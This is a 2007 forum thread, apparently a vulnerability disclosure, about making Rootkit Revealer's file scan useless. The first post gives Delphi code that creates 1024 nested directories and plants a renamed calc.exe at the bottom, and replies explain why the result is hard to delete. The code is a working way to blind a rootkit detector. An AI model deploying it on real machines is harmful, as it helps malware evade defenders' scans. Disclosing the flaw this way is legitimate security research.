Exploiting Rootkit Revealer Vulnerability

Rootkit Revealer (RKR) is a well-known standalone rootkit detection scanner which can be used for revealing wide-spread user mode rootkits and some kernel mode stuff.

It can detect hidden files by RAW reading and self-implemented file system parsing. It can detect hidden registry keys by dumping registry at disk from driver by using ZwSaveKey function and self-implemented parsing of this dump.

There are exists several techniques which can be used to completely bypass RKR, but detector itself can help in it bypassing. This vulnerability presents in every version of RKR including most oldest command line variants.

Main goal of exploit - use file-system restrictions which obviously presents in RKR. Exploit creates 1024 embedded directories and copies calc.exe (Windows Calculator) to the last directory under name "test.exe". After creating this exploit on disk any RKR file scan will be completely useless, because RKR will list all directories and files on disk after exploit directory as "Visible in Windows API, MFT, but not in directory index".

Using this exploit with old console version will lead to access violation message.

Exploit code is below.

WARNING!
Due to file system origin and Windows UI restrictions it is not so easy to remove generated exploit from disk. So do not use it on real machine, if you don't know how to remove it.

var   i: integer;   buf: array[0..100000] of wchar;   buf2: LBuf; begin   memzero(@buf, sizeof(buf));   GetWindowsDirectoryW(buf2, MAX_PATH);   strcpyW(buf, '\\?\C:\adir');   CreateDirectoryW(buf, nil);   for i := 0 to 1023 do   begin     strcatW(buf, '\adir');     CreateDirectoryW(buf, nil);   end;   strcatW(buf, '\test.exe');   strcatW(buf2, '\calc.exe');   CopyFileW(buf2, buf, false); end;

This is not a "pure" exploit which escalates right etc. It can be clarified as another sample of Denial Of Service.

To fix this vulnerability it is obviously needed built in RKR UNC paths supports.

Kind Regards,
EP_X0FF/UG North


Edited by EP_X0FF - 10 June 2007 at 10:52am

Originally posted by EP_X0FF Exploit code is below. WARNING! Due to file system origin and Windows UI restrictions it is not so easy to remove generated exploit from disk. So do not use it on real machine, if you don't know how to remove it. var   i: integer;   buf: array[0..100000] of wchar;   buf2: LBuf; begin   memzero(@buf, sizeof(buf));   GetWindowsDirectoryW(buf2, MAX_PATH);   strcpyW(buf, '\\?\C:\adir');   CreateDirectoryW(buf, nil);   for i := 0 to 1023 do   begin     strcatW(buf, '\adir');     CreateDirectoryW(buf, nil);   end;   strcatW(buf, '\test.exe');   strcatW(buf2, '\calc.exe');   CopyFileW(buf2, buf, false); end;

Could you explain the persistence of above code, why is it not easy to remove and is this only related to ntfs or also to fat32?

Originally posted by SystemPro Could you explain the persistence of above code, why is it not easy to remove and is this only related to ntfs or also to fat32?

This code creates 1024 embedded directories and puts Windows Calculator in the last one under the name "test.exe". After reaching this exploit directory Rootkit Revealer drivers mad and lists everything on disk as Visible in Windows API, MFT, but not in directory index.

This was tested on NTFS disk, I don't know about FAT32.
This exploit not so easy to remove, because Windows Explorer (default Windows shell) has path length limitations, as pointed by Mixel it is MAX_PATH constant.

Explorer can't remove such directories and even can't normally calculate how many directories and files inside such exploit-directory.

This mean that this is UNC path.

No problem :)